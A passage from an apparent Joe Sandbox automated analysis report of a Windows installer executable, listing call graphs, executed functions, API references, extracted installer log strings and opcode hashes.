4 API calls 57205->57206 57207 447e29 57206->57207 57208 4037b8 4 API calls 57207->57208 57209 447e41 57208->57209 57210 403778 4 API calls 57209->57210 57211 447e6c 57210->57211 57212 4037b8 4 API calls 57211->57212 57223 447e84 57212->57223 57213 447ebc 57215 403420 4 API calls 57213->57215 57214 447f57 57219 447f5f GetProcAddress 57214->57219 57216 447f9c 57215->57216 57216->57192 57217 447edf LoadLibraryExA 57217->57223 57218 447ef1 LoadLibraryA 57218->57223 57220 447f72 57219->57220 57220->57213 57221 403b80 4 API calls 57221->57223 57222 403450 4 API calls 57222->57223 57223->57213 57223->57214 57223->57217 57223->57218 57223->57221 57223->57222 57225 43d31c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57223->57225 57225->57223 57226 44ad3c 57227 44ad4a 57226->57227 57229 44ad69 57226->57229 57228 44ac20 11 API calls 57227->57228 57227->57229 57228->57229 57230 447fbc 57231 447ff1 57230->57231 57232 447fea 57230->57232 57233 448005 57231->57233 57234 447dc0 7 API calls 57231->57234 57236 403400 4 API calls 57232->57236 57233->57232 57235 403494 4 API calls 57233->57235 57234->57233 57237 44801e 57235->57237 57238 44819b 57236->57238 57239 4037b8 4 API calls 57237->57239 57240 44803a 57239->57240 57241 4037b8 4 API calls 57240->57241 57242 448056 57241->57242 57242->57232 57243 44806a 57242->57243 57244 4037b8 4 API calls 57243->57244 57245 448084 57244->57245 57246 431464 4 API calls 57245->57246 57247 4480a6 57246->57247 57248 431534 4 API calls 57247->57248 57249 4480c6 57247->57249 57248->57247 57252 448104 57249->57252 57273 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57249->57273 57256 44811c 57252->57256 57274 442e64 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57252->57274 57253 448150 GetLastError 57275 447d54 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57253->57275 57262 441bc8 57256->57262 57257 44815f 57276 442ea4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57257->57276 57259 448174 57277 442eb4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57259->57277 57261 44817c 57263 442ba6 57262->57263 57264 441c01 57262->57264 57265 403400 4 API calls 57263->57265 57266 403400 4 API calls 57264->57266 57267 442bbb 57265->57267 57268 441c09 57266->57268 57267->57253 57269 431464 4 API calls 57268->57269 57271 441c15 57269->57271 57270 442b96 57270->57253 57271->57270 57278 4412a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57271->57278 57273->57249 57274->57256 57275->57257 57276->57259 57277->57261 57278->57271 57279 22e1010 57281 22e1019 57279->57281 57280 22e101d 57281->57280 57283 45bbf8 5 API calls 57281->57283 57282 22e106a 57283->57282

                                                                            Executed Functions

                                                                            Function 0046C0D0 Relevance: 78.0, APIs: 4, Strings: 40, Instructions: 959COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            • Time stamp of existing file: %s, xrefs: 0046C453
                                                                            • Installing the file., xrefs: 0046C931
                                                                            • Time stamp of our file: %s, xrefs: 0046C3C3
                                                                            • Time stamp of our file: (failed to read), xrefs: 0046C3CF
                                                                            • Uninstaller requires administrator: %s, xrefs: 0046CB9D
                                                                            • , xrefs: 0046C5F7, 0046C7C8, 0046C846
                                                                            • Incrementing shared file count (32-bit)., xrefs: 0046CFB0
                                                                            • Couldn't read time stamp. Skipping., xrefs: 0046C75D
                                                                            • InUn, xrefs: 0046CB6D
                                                                            • Skipping due to "onlyifdoesntexist" flag., xrefs: 0046C3F6
                                                                            • Existing file's MD5 sum is different from our file. Proceeding., xrefs: 0046C6EC
                                                                            • Time stamp of existing file: (failed to read), xrefs: 0046C45F
                                                                            • Stripped read-only attribute., xrefs: 0046C8EF
                                                                            • Failed to read existing file's MD5 sum. Proceeding., xrefs: 0046C6F8
                                                                            • Existing file has a later time stamp. Skipping., xrefs: 0046C7F7
                                                                            • Will register the file (a DLL/OCX) later., xrefs: 0046CF2A
                                                                            • Dest filename: %s, xrefs: 0046C2BC
                                                                            • Same time stamp. Skipping., xrefs: 0046C77D
                                                                            • User opted not to overwrite the existing file. Skipping., xrefs: 0046C875
                                                                            • Version of existing file: %u.%u.%u.%u, xrefs: 0046C5A4
                                                                            • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046C8BE
                                                                            • Version of our file: (none), xrefs: 0046C524
                                                                            • Failed to strip read-only attribute., xrefs: 0046C8FB
                                                                            • -- File entry --, xrefs: 0046C123
                                                                            • Same version. Skipping., xrefs: 0046C70D
                                                                            • Will register the file (a type library) later., xrefs: 0046CF1E
                                                                            • Version of existing file: (none), xrefs: 0046C722
                                                                            • Version of our file: %u.%u.%u.%u, xrefs: 0046C518
                                                                            • Dest file is protected by Windows File Protection., xrefs: 0046C315
                                                                            • UF, xrefs: 0046D11F
                                                                            • Existing file's MD5 sum matches our file. Skipping., xrefs: 0046C6DD
                                                                            • Dest file exists., xrefs: 0046C3E3
                                                                            • Skipping due to "onlyifdestfileexists" flag., xrefs: 0046C922
                                                                            • Incrementing shared file count (64-bit)., xrefs: 0046CF97
                                                                            • @, xrefs: 0046C1D8
                                                                            • Non-default bitness: 32-bit, xrefs: 0046C2E3
                                                                            • Non-default bitness: 64-bit, xrefs: 0046C2D7
                                                                            • .tmp, xrefs: 0046C9DF
                                                                            • Existing file is protected by Windows File Protection. Skipping., xrefs: 0046C814
                                                                            • Existing file is a newer version. Skipping., xrefs: 0046C62A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$UF$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                            • API String ID: 0-843965562
                                                                            • Opcode ID: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
                                                                            • Instruction ID: 2c976b8502b68867d0ce509d0e418c852ac65d8e3c14b9799468bf735a09a243
                                                                            • Opcode Fuzzy Hash: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
                                                                            • Instruction Fuzzy Hash: A5926430E042489FCB11DFA5C495BEDBBB5AF09304F5440ABE844AB392E7789E45CF5A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00423B7C Relevance: 21.4, APIs: 14, Instructions: 395COMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1557 423b7c-423bb0 1558 423bb2-423bb3 1557->1558 1559 423be4-423bfb call 423ad8 1557->1559 1561 423bb5-423bd1 call 40b3ac 1558->1561 1564 423c5c-423c61 1559->1564 1565 423bfd 1559->1565 1584 423bd3-423bdb 1561->1584 1585 423be0-423be2 1561->1585 1567 423c63 1564->1567 1568 423c97-423c9c 1564->1568 1569 423c03-423c06 1565->1569 1570 423cc0-423cd0 1565->1570 1574 423f21-423f29 1567->1574 1575 423c69-423c71 1567->1575 1578 423ca2-423ca5 1568->1578 1579 42400a-424018 IsIconic 1568->1579 1576 423c35-423c38 1569->1576 1577 423c08 1569->1577 1572 423cd2-423cd7 1570->1572 1573 423cdb-423ce3 call 424104 1570->1573 1586 423ce8-423cf0 call 42414c 1572->1586 1587 423cd9-423cfc call 423af4 1572->1587 1580 4240c2-4240ca 1573->1580 1574->1580 1581 423f2f-423f3a call 418150 1574->1581 1589 423e83-423eaa SendMessageA 1575->1589 1590 423c77-423c7c 1575->1590 1582 423d19-423d20 1576->1582 1583 423c3e-423c3f 1576->1583 1592 423d66-423d76 call 423af4 1577->1592 1593 423c0e-423c11 1577->1593 1594 424046-42405b call 4247c0 1578->1594 1595 423cab-423cac 1578->1595 1579->1580 1591 42401e-424029 GetFocus 1579->1591 1596 4240e1-4240e7 1580->1596 1581->1580 1645 423f40-423f4f call 418150 IsWindowEnabled 1581->1645 1582->1580 1605 423d26-423d2d 1582->1605 1606 423c45-423c48 1583->1606 1607 423eaf-423eb6 1583->1607 1584->1596 1585->1559 1585->1561 1586->1580 1587->1580 1589->1580 1608 423c82-423c83 1590->1608 1609 423fba-423fc5 1590->1609 1591->1580 1600 42402f-424038 call 41ef64 1591->1600 1592->1580 1601 423c17-423c1a 1593->1601 1602 423d8e-423daa PostMessageA call 423af4 1593->1602 1594->1580 1611 423cb2-423cb5 1595->1611 1612 42405d-424064 1595->1612 1600->1580 1658 42403e-424044 SetFocus 1600->1658 1618 423c20-423c23 1601->1618 1619 423e15-423e1c 1601->1619 1602->1580 1605->1580 1624 423d33-423d39 1605->1624 1625 423c4e-423c51 1606->1625 1626 423daf-423dcf call 423af4 1606->1626 1607->1580 1614 423ebc-423ec1 call 404e54 1607->1614 1627 423fe2-423fed 1608->1627 1628 423c89-423c8c 1608->1628 1609->1580 1630 423fcb-423fdd 1609->1630 1631 424090-424097 1611->1631 1632 423cbb 1611->1632 1621 424066-424079 call 424444 1612->1621 1622 42407b-42408e call 42449c 1612->1622 1614->1580 1640 423c29-423c2a 1618->1640 1641 423d3e-423d4c IsIconic 1618->1641 1642 423e1e-423e31 call 423a84 1619->1642 1643 423e4f-423e60 call 423af4 1619->1643 1621->1580 1622->1580 1624->1580 1646 423c57 1625->1646 1647 423d7b-423d89 call 4240e8 1625->1647 1672 423df3-423e10 call 4239f4 PostMessageA 1626->1672 1673 423dd1-423dee call 423a84 PostMessageA 1626->1673 1627->1580 1634 423ff3-424005 1627->1634 1651 423c92 1628->1651 1652 423ec6-423ece 1628->1652 1630->1580 1649 4240aa-4240b9 1631->1649 1650 424099-4240a8 1631->1650 1633 4240bb-4240bc call 423af4 1632->1633 1681 4240c1 1633->1681 1634->1580 1659 423c30 1640->1659 1660 423d01-423d09 1640->1660 1666 423d5a-423d61 call 423af4 1641->1666 1667 423d4e-423d55 call 423b30 1641->1667 1686 423e43-423e4a call 423af4 1642->1686 1687 423e33-423e3d call 41eec8 1642->1687 1691 423e62-423e68 call 41ee14 1643->1691 1692 423e76-423e7e call 4239f4 1643->1692 1645->1580 1688 423f55-423f64 call 418150 IsWindowVisible 1645->1688 1646->1633 1647->1580 1649->1580 1650->1580 1651->1633 1652->1580 1657 423ed4-423edb 1652->1657 1657->1580 1674 423ee1-423ef0 call 418150 IsWindowEnabled 1657->1674 1658->1580 1659->1633 1660->1580 1675 423d0f-423d14 call 422bbc 1660->1675 1666->1580 1667->1580 1672->1580 1673->1580 1674->1580 1703 423ef6-423f0c call 412280 1674->1703 1675->1580 1681->1580 1686->1580 1687->1686 1688->1580 1709 423f6a-423fb5 GetFocus call 418150 SetFocus call 4151b0 SetFocus 1688->1709 1707 423e6d-423e70 1691->1707 1692->1580 1703->1580 1712 423f12-423f1c 1703->1712 1707->1692 1709->1580 1712->1580
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                            • Instruction ID: 7115e30b2d35316c82e91109ae6d6d6b504554527cf119b6ec0a5d38efd5eaef
                                                                            • Opcode Fuzzy Hash: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                            • Instruction Fuzzy Hash: 88E19A30B00124EBC710DF69E585A5EB7B0FF48704FA441AAE645AB352CB7DEE81DB09
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004637D4 Relevance: 13.9, APIs: 4, Strings: 3, Instructions: 1645windowCOMMON
                                                                            Download Yara Rule

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 1924 4637d4-4637ea 1925 4637f4-4638ab call 48f6b4 call 402b30 * 6 1924->1925 1926 4637ec-4637ef call 402d30 1924->1926 1943 4638ad-4638d4 call 4145ac 1925->1943 1944 4638e8-463901 1925->1944 1926->1925 1948 4638d6 1943->1948 1949 4638d9-4638e3 call 41456c 1943->1949 1950 463903-46392a call 41458c 1944->1950 1951 46393e-46394c call 48f994 1944->1951 1948->1949 1949->1944 1957 46392f-463939 call 41454c 1950->1957 1958 46392c 1950->1958 1959 46394e-46395d call 48f804 1951->1959 1960 46395f-463961 call 48f928 1951->1960 1957->1951 1958->1957 1965 463966-4639b9 call 48f318 call 41a340 * 2 1959->1965 1960->1965 1972 4639ca-4639df call 4508e0 call 414a88 1965->1972 1973 4639bb-4639c8 call 414a88 1965->1973 1979 4639e4-4639eb 1972->1979 1973->1979 1980 463a33-463eb9 call 48f754 call 48fa50 call 41458c * 3 call 41462c call 41454c * 3 call 45d190 call 45d1a8 call 45d1b4 call 45d1fc call 45d190 call 45d1a8 call 45d1b4 call 45d1fc call 45d1a8 call 45d1fc LoadBitmapA call 41d620 call 45d1cc call 45d1e4 call 463630 call 4650b4 call 462cac call 40357c call 414a88 call 462fe4 call 462fec call 462cac call 40357c * 2 call 414a88 call 4650b4 call 462cac call 414a88 call 462fe4 call 462fec call 414a88 * 2 call 4650b4 call 414a88 * 2 call 462fe4 call 41456c call 462fe4 call 41456c call 4650b4 call 414a88 call 462fe4 call 462fec call 4650b4 call 414a88 call 462fe4 call 41456c * 2 call 414a88 call 462fe4 call 41456c 1979->1980 1981 4639ed-463a2e call 41462c call 414670 call 420f08 call 420f34 call 420ad8 call 420b04 1979->1981 2111 463f15-463f2e call 4149b4 * 2 1980->2111 2112 463ebb-463f13 call 41456c call 414a88 call 462fe4 call 41456c 1980->2112 1981->1980 2119 463f33-463fe4 call 462cac call 4650b4 call 462cac call 414a88 call 48fa50 call 462fe4 2111->2119 2112->2119 2138 463fe6-464001 2119->2138 2139 46401e-464242 call 462cac call 414a88 call 48fa60 * 2 call 42e668 call 41456c call 462fe4 call 41456c call 414a88 call 48f754 call 48fa50 call 41458c call 462cac call 414a88 call 462fe4 call 41456c call 462cac call 4650b4 call 462cac call 414a88 call 462fe4 call 41456c call 462fec call 462cac call 414a88 call 462fe4 2119->2139 2140 464006-464019 call 41456c 2138->2140 2141 464003 2138->2141 2196 464244-46424d 2139->2196 2197 464283-46433c call 462cac call 4650b4 call 462cac call 414a88 call 48fa50 call 462fe4 2139->2197 2140->2139 2141->2140 2196->2197 2199 46424f-46427e call 4149b4 call 462fec 2196->2199 2215 464376-464797 call 462cac call 414a88 call 48fa60 * 2 call 42e668 call 41456c call 462fe4 call 41456c call 414a88 call 48f754 call 48fa50 call 41458c call 414a88 call 462cac call 4650b4 call 462cac call 414a88 call 462fe4 call 462fec call 42bb40 call 48fa60 call 44e144 call 462cac call 4650b4 call 462cac call 4650b4 call 462cac call 4650b4 * 2 call 414a88 call 462fe4 call 462fec call 4650b4 call 48f318 call 41a340 call 462cac call 40357c call 414a88 call 462fe4 call 41456c call 414a88 * 2 call 48fa60 call 403494 call 40357c * 2 call 414a88 2197->2215 2216 46433e-464359 2197->2216 2199->2197 2315 4647bb-4647c2 2215->2315 2316 464799-4647b6 call 44f674 call 44f7d0 2215->2316 2217 46435e-464371 call 41456c 2216->2217 2218 46435b 2216->2218 2217->2215 2218->2217 2318 4647e6-4647ed 2315->2318 2319 4647c4-4647e1 call 44f674 call 44f7d0 2315->2319 2316->2315 2320 464811-464857 call 418150 GetSystemMenu AppendMenuA call 403738 AppendMenuA call 4651a8 2318->2320 2321 4647ef-46480c call 44f674 call 44f7d0 2318->2321 2319->2318 2336 464871 2320->2336 2337 464859-464860 2320->2337 2321->2320 2340 464873-464882 2336->2340 2338 464862-46486b 2337->2338 2339 46486d-46486f 2337->2339 2338->2336 2338->2339 2339->2340 2341 464884-46488b 2340->2341 2342 46489c 2340->2342 2343 46488d-464896 2341->2343 2344 464898-46489a 2341->2344 2345 46489e-4648b8 2342->2345 2343->2342 2343->2344 2344->2345 2346 464961-464968 2345->2346 2347 4648be-4648c7 2345->2347 2350 46496e-464991 call 476f14 call 403450 2346->2350 2351 4649fc-464a0a call 414a88 2346->2351 2348 464922-46495c call 414a88 * 3 2347->2348 2349 4648c9-464920 call 476f14 call 414a88 call 476f14 call 414a88 call 476f14 call 414a88 2347->2349 2348->2346 2349->2346 2374 4649a3-4649b7 call 403494 2350->2374 2375 464993-4649a1 call 403494 2350->2375 2356 464a0f-464a18 2351->2356 2360 464a1e-464a36 call 429f48 2356->2360 2361 464b28-464b57 call 42b8dc call 44e0d0 2356->2361 2378 464aad-464ab1 2360->2378 2379 464a38-464a3c 2360->2379 2395 464c05-464c09 2361->2395 2396 464b5d-464b61 2361->2396 2391 4649c9-4649fa call 42c6e0 call 42ca9c call 403494 call 414a88 2374->2391 2392 4649b9-4649c4 call 403494 2374->2392 2375->2391 2384 464ab3-464abc 2378->2384 2385 464b01-464b05 2378->2385 2386 464a3e-464a78 call 40b3ac call 476f14 2379->2386 2384->2385 2393 464abe-464ac9 2384->2393 2389 464b07-464b17 call 429fcc 2385->2389 2390 464b19-464b23 call 429fcc 2385->2390 2454 464aa7-464aab 2386->2454 2455 464a7a-464a81 2386->2455 2389->2361 2390->2361 2391->2356 2392->2391 2393->2385 2402 464acb-464acf 2393->2402 2405 464c0b-464c12 2395->2405 2406 464c88-464c8c 2395->2406 2404 464b63-464b75 call 40b3ac 2396->2404 2411 464ad1-464af4 call 40b3ac call 406a2c 2402->2411 2432 464ba7-464bde call 476f14 call 44c3a0 2404->2432 2433 464b77-464ba5 call 476f14 call 44c470 2404->2433 2405->2406 2414 464c14-464c1b 2405->2414 2415 464cf5-464cfe 2406->2415 2416 464c8e-464ca5 call 40b3ac 2406->2416 2463 464af6-464af9 2411->2463 2464 464afb-464aff 2411->2464 2414->2406 2424 464c1d-464c28 2414->2424 2422 464d00-464d18 call 40b3ac call 465e1c 2415->2422 2423 464d1d-464d32 call 463390 call 463108 2415->2423 2438 464ca7-464ce3 call 40b3ac call 465e1c * 2 call 465cbc 2416->2438 2439 464ce5-464cf3 call 465e1c 2416->2439 2422->2423 2471 464d84-464d8e call 4149b4 2423->2471 2472 464d34-464d57 call 429fb0 call 40b3ac 2423->2472 2424->2423 2426 464c2e-464c32 2424->2426 2437 464c34-464c4a call 40b3ac 2426->2437 2473 464be3-464be7 2432->2473 2433->2473 2468 464c4c-464c78 call 429fcc call 465e1c call 465cbc 2437->2468 2469 464c7d-464c81 2437->2469 2438->2423 2439->2423 2454->2378 2454->2386 2455->2454 2465 464a83-464a95 call 406a2c 2455->2465 2463->2385 2464->2385 2464->2411 2465->2454 2483 464a97-464aa1 2465->2483 2468->2423 2469->2437 2482 464c83 2469->2482 2484 464d93-464db2 call 4149b4 2471->2484 2502 464d62-464d71 call 4149b4 2472->2502 2503 464d59-464d60 2472->2503 2480 464bf2-464bf4 2473->2480 2481 464be9-464bf0 2473->2481 2488 464bfb-464bff 2480->2488 2481->2480 2481->2488 2482->2423 2483->2454 2489 464aa3 2483->2489 2498 464db4-464dd7 call 429fb0 call 465f7c 2484->2498 2499 464ddc-464dff call 476f14 call 403450 2484->2499 2488->2395 2488->2404 2489->2454 2498->2499 2517 464e01-464e0a 2499->2517 2518 464e1c-464e25 2499->2518 2502->2484 2503->2502 2507 464d73-464d82 call 4149b4 2503->2507 2507->2484 2517->2518 2519 464e0c-464e1a call 403494 2517->2519 2520 464e27-464e39 call 403684 2518->2520 2521 464e3b-464e4b call 403494 2518->2521 2528 464e5d-464e74 call 414a88 2519->2528 2520->2521 2529 464e4d-464e58 call 403494 2520->2529 2521->2528 2533 464e76-464e7d 2528->2533 2534 464eaa-464eb4 call 4149b4 2528->2534 2529->2528 2535 464e7f-464e88 2533->2535 2536 464e8a-464e94 call 42b054 2533->2536 2540 464eb9-464ede call 403400 * 3 2534->2540 2535->2536 2538 464e99-464ea8 call 4149b4 2535->2538 2536->2538 2538->2540
                                                                            APIs
                                                                              • Part of subcall function 0048F804: GetWindowRect.USER32(00000000), ref: 0048F81A
                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00463BA3
                                                                              • Part of subcall function 0041D620: GetObjectA.GDI32(?,00000018,00463BBD), ref: 0041D64B
                                                                              • Part of subcall function 00463630: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
                                                                              • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
                                                                              • Part of subcall function 00463630: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
                                                                              • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
                                                                              • Part of subcall function 00462FEC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
                                                                              • Part of subcall function 0048FA60: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0048FA6A
                                                                              • Part of subcall function 0048F754: 73A0A570.USER32(00000000,?,?,?), ref: 0048F776
                                                                              • Part of subcall function 0048F754: SelectObject.GDI32(?,00000000), ref: 0048F79C
                                                                              • Part of subcall function 0048F754: 73A0A480.USER32(00000000,?,0048F7FA,0048F7F3,?,00000000,?,?,?), ref: 0048F7ED
                                                                              • Part of subcall function 0048FA50: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0048FA5A
                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02200500,02202154,?,?,02202184,?,?,022021D4,?), ref: 0046481B
                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046482C
                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00464844
                                                                              • Part of subcall function 00429FCC: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FE2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$AppendExtractFileIconInfoObject$A480A570BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                                                            • String ID: $(Default)$STOPIMAGE
                                                                            • API String ID: 1965080796-770201673
                                                                            • Opcode ID: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                            • Instruction ID: a97045497617a37e73d7fe25ec91c7d2f949ac95d49f9cf5c1555c71fec600f2
                                                                            • Opcode Fuzzy Hash: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                            • Instruction Fuzzy Hash: C9F2D5386005119FCB00EB69D8D9F9973F5BF89304F1542B6E5049B36AD778EC4ACB8A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047A44C Relevance: 9.1, APIs: 6, Instructions: 149fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?,?,00000000), ref: 0047A4AC
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A4F5
                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D), ref: 0047A502
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A54E
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000), ref: 0047A5F7
                                                                            • FindClose.KERNEL32(000000FF,0047A622,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000), ref: 0047A615
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                            • Instruction ID: df6970a490733c3fc08b9eb15c5b52ce16d10e4af30c9d3b25a464b00084d34d
                                                                            • Opcode Fuzzy Hash: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                            • Instruction Fuzzy Hash: FE516F71900648AFCB11EF65CC45ADEB7BCEB88319F1084BAA408E7341D6389F55CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0047077C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 99fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004707D5
                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708B2
                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID: unins$unins???.*
                                                                            • API String ID: 3541575487-1009660736
                                                                            • Opcode ID: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                            • Instruction ID: 3fcbdb993abfa6ff85d44bbf729c32bfcaea701f4f0f62c70188b68341c8b9af
                                                                            • Opcode Fuzzy Hash: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                            • Instruction Fuzzy Hash: 57315370A00108DBDB10EB65C885ADEB7A8DF45304F55C0B6E448AB7A2D738DF419B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00447DC0 Relevance: 4.7, APIs: 3, Instructions: 151libraryloaderCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00447F9D), ref: 00447EE0
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00447F61
                                                                            Memory Dump Source
